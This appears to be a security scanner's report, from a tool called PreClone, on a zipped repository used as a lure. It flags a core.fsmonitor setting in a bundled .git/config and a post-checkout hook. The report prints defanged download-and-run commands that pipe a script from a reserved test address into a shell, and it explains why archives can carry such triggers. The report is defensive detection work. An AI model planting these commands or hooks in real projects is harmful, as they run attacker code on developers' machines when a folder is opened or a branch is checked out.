2 critical findings match patterns used by malware hidden in repos, set to run when you open the folder and when you commit or switch branches. Fake take-home tests and “review our code” lures are built this way.
Don't open it in VS Code, Cursor or any other editor or IDE. Don't commit, check out branches or pull in it.
If you already did: from another device, change the passwords saved in your browser, revoke GitHub, npm and cloud tokens, and move any crypto to a new wallet.
If someone sent it to you, check who they are before you reply, and don't run anything else they send.
When you open the folder
VS Code, Cursor, JetBrains, rust-analyzer, dev containers, Vim, Emacs, direnv, mise
CriticalRuns without asking
Git runs a command from the bundled .git/config on every git status (core.fsmonitor)
A repository you clone can't bring its own .git/config, but this archive does. Git runs sh -c 'curl -s hxxp://192[.]0[.]2[.]44/u | sh' # on every git status, which editors, shell prompts and coding agents run as soon as they open the folder. It downloads a script and pipes it to a shell.
The archive includes an active git hook: post-checkout
Clones never contain .git/hooks, but archives can. Git runs post-checkout as soon as you check out or switch a branch. Shipping a live hook inside a zip is a known way to get code running from a “just look at our repo” message. It downloads a script and pipes it to a shell.
.git/hooks/post-checkoutline 1
1#!/bin/sh2# PreClone demo fixture — inert reconstruction. Addresses are reserved test ranges; this file is shown, never run.3nohup sh -c 'curl -s hxxp://192[.]0[.]2[.]44/p | sh' >/dev/null 2>&1 &
Everything that runs
Every entry point PreClone found, including the ordinary ones, so you can see the whole picture and not just the alarms.
Opengit status (editor git panel, shell prompt, agent)
sh -c 'curl -s hxxp://192[.]0[.]2[.]44/u | sh' #.git/config:5core.fsmonitor
3 direct dependencies. Checked against npm (packages it removed as malware, install scripts, downloads) and OSV malware advisories on Oct 11, 2026, when this example was captured. None matched a malware advisory or looked like a typo of a popular package.
Show the list
react^19.1.0
react-dom^19.1.0
vite^6.3.5dev
What this report can't tell you
PreClone reads files; it never runs them. Code that is downloaded later from somewhere else, compiled binaries and encrypted payloads can hide from a static read.